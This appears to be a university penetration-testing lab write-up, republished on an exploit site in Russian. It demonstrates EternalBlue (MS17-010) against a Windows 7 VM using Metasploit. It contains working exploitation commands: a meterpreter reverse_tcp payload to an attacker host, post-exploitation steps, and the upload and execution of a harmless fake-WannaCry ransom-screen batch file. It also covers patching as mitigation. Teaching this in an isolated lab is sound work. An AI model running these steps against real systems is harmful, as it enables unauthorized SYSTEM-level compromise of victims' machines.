Sploitus

EternalBlue-Exploit-Demonstration-MS17-010

kitploit · 2026-08-25

Exploit Code

MARKDOWN439 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ICHHYAK22-ETERNALBLUE-EXPLOIT-DEMONSTRATION-MS17-010
# Демонстрация эксплойта EternalBlue (MS17-010)

Лабораторная работа по кибербезопасности, демонстрирующая эксплуатацию уязвимости CVE-2017-0144 (EternalBlue) с помощью Metasploit на уязвимой системе Windows 7 с получением доступа уровня SYSTEM через Meterpreter.

Этот проект также симулирует атаку программы-вымогателя типа WannaCry (БЕЗОПАСНАЯ ДЕМОНСТРАЦИЯ) и демонстрирует смягчение угрозы с помощью патча безопасности MS17-010.

* * *

## Module Information

**Модуль:** CSCM828 Security Vulnerabilities and Penetration Testing

**Студенты:**

  * Daniel Nicolas Rentapalli (2548048)
  * Ichhya Koirala (2607189)



**Университет:** Университет Суонси

* * *

## Resources & Downloads

  1. **MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption**  
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. **KB4012212 (Windows 7 x64 Security Update)**  
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. **Kali Linux (Загрузка виртуальных машин)**  
https://www.kali.org/get-kali/#kali-virtual-machines

  4. **Windows 7 SP1 Home Premium English x64 (ISO)**  
https://archive.org/details/windows-7-home-prem-english

  5. **VMware Workstation Pro**  
https://www.vmware.com/products/desktop-hyper




* * *

## 1\. Обзор

В этой лабораторной работе демонстрируется:

  * Удаленная эксплуатация уязвимости SMB (MS17-010)
  * Доступ на уровне ядра через EternalBlue
  * Установка сессии Meterpreter
  * Методы постэксплуатации
  * Симуляция программы-вымогателя типа WannaCry (безопасная)
  * Смягчение угрозы с помощью патча



* * *

## 2\. Лабораторная среда

### Требования

  * VMware Workstation / VirtualBox
  * Минимум 8 ГБ ОЗУ



### Атакующая машина

  * Kali Linux
  * Metasploit Framework



### Целевая машина

  * Windows 7 SP1 x64 (без патчей)



### Сеть

  * Host-only / NAT (изолированная среда)
  * Убедитесь, что обе машины могут взаимодействовать друг с другом



⚠️ Эта лабораторная работа должна проводиться в полностью изолированной среде.

* * *

## 3\. Настройка жертвы (Windows 7)

Запустите в командной строке от имени администратора:

### Отключение брандмауэра

root@kitploit:~
    
    
    netsh advfirewall set allprofiles state off
    

### Проверка порта SMB

root@kitploit:~
    
    
    netstat -an | findstr :445
    

### Отключение обновлений (для стабильности лаборатории)

root@kitploit:~
    
    
    sc stop wuauserv
    sc config wuauserv start= disabled
    

* * *

## 4\. Настройка атакующей машины (Kali Linux)

### Проверка соединения

root@kitploit:~
    
    
    ping <victim-ip>
    nmap -p 445 <victim-ip>
    

* * *

## 5\. Этапы эксплуатации

### Шаг 1: Сканирование цели

root@kitploit:~
    
    
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

Ожидаемый результат:

  * Host is VULNERABLE



* * *

### Шаг 2: Запуск эксплойта

root@kitploit:~
    
    
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOSTS <victim-ip>
    set LHOST <attacker-ip>
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    run
    

* * *

### Шаг 3: Подтверждение доступа

root@kitploit:~
    
    
    meterpreter > getuid
    

Ожидаемый результат:

root@kitploit:~
    
    
    NT AUTHORITY\SYSTEM
    

* * *

## 6\. Постэксплуатация

root@kitploit:~
    
    
    sysinfo
    getuid
    ps
    screenshot
    shell
    whoami
    ipconfig
    

### Стабильная миграция

root@kitploit:~
    
    
    ps
    migrate <explorer.exe PID>
    

* * *

## 7\. Симуляция WannaCry (БЕЗОПАСНАЯ ДЕМОНСТРАЦИЯ)

### Создание полезной нагрузки (Kali)

root@kitploit:~
    
    
    cat > /tmp/wannacry64.bat << 'EOF'
    @echo off
    title WannaCryptor Demo - SAFE SIMULATION
    color 0a
    mode con: cols=80 lines=25
    cls
    
    setlocal enabledelayedexpansion
    
    set id=%random%-%random%-%random%
    set /a timeleft=60
    
    :main
    cls
    echo ========================================================
    echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
    echo ========================================================
    echo.
    echo  All files have been encrypted!
    echo.
    echo  Send 0.25 BTC to:
    echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
    echo.
    echo  Personal ID: %id%
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    echo Initializing encryption...
    timeout /t 2 >nul
    
    for /l %%i in (1,1,20) do (
        set /a percent=%%i*5
        call :progress !percent!
        timeout /t 1 >nul
    )
    
    goto countdown
    
    :progress
    set bar=
    set /a blocks=%1/5
    for /l %%b in (1,1,!blocks!) do set bar=!bar!#
    cls
    echo ========================================================
    echo           ENCRYPTING FILES...
    echo ========================================================
    echo.
    echo Progress: [%bar%] %1%%
    echo.
    
    set /a randfile=%random% %% 5
    if !randfile!==0 echo Encrypting: documents.docx
    if !randfile!==1 echo Encrypting: photos.jpg
    if !randfile!==2 echo Encrypting: database.sql
    if !randfile!==3 echo Encrypting: backup.zip
    if !randfile!==4 echo Encrypting: project.pptx
    
    exit /b
    
    :countdown
    cls
    
    :loop
    cls
    echo ========================================================
    echo           YOUR FILES ARE ENCRYPTED
    echo ========================================================
    echo.
    echo  Pay within the time limit or files will be lost!
    echo.
    echo  Time remaining: !timeleft! seconds
    echo.
    echo ========================================================
    echo.
    
    if !timeleft! LEQ 0 goto end
    
    set /a timeleft-=1
    timeout /t 1 >nul
    goto loop
    
    :end
    cls
    echo ========================================================
    echo              TIME EXPIRED
    echo ========================================================
    echo.
    echo  Your files are permanently locked.
    echo.
    echo  (This was a SAFE DEMO simulation)
    echo.
    echo ========================================================
    pause
    EOF
    

* * *

### Загрузка и выполнение

root@kitploit:~
    
    
    meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
    meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
    

* * *

## 8\. Смягчение (Демонстрация патча)

### Шаг 1: Загрузка патча

  * Посетите: https://www.catalog.update.microsoft.com/
  * Найдите: **KB4012212 Windows 7 x64**
  * Загрузите `.msu` файл



* * *

### Шаг 2: Установка патча

root@kitploit:~
    
    
    wusa.exe KB4012212-x64.msu /quiet /norestart
    

* * *

### Шаг 3: Перезагрузка

root@kitploit:~
    
    
    shutdown /r /t 0
    

* * *

### Шаг 4: Проверка установки патча

root@kitploit:~
    
    
    systeminfo | findstr KB4012212
    

* * *

### Шаг 5: Повторный запуск эксплойта

Ожидаемый результат:

  * Эксплойт не удается
  * Нет сессии Meterpreter



* * *

### Шаг 6: Проверка с помощью Nmap

root@kitploit:~
    
    
    nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>
    

Ожидаемый результат:

  * NOT VULNERABLE



* * *

## 9\. Устранение неполадок

Проблема| Решение  
---|---  
Эксплойт не удается| Проверьте соединение  
Нет сессии| Отключите брандмауэр  
Сессия прерывается| Повторите эксплойт  
Нет видимого окна| Переместитесь в explorer.exe  
  
* * *

## 10\. Этические соображения

Этот проект проводится:

  * Только на контролируемых лабораторных машинах
  * В полностью изолированной сети
  * Только в образовательных целях



Несанкционированное использование нарушает:

  * UK Computer Misuse Act 1990



* * *

## 11\. Заключение

Эта лабораторная работа демонстрирует:

  * Реальную эксплуатацию SMB с помощью EternalBlue
  * Компрометацию Windows 7 на уровне SYSTEM
  * Симуляцию атаки программы-вымогателя (безопасная)
  * Важность своевременного установки патчей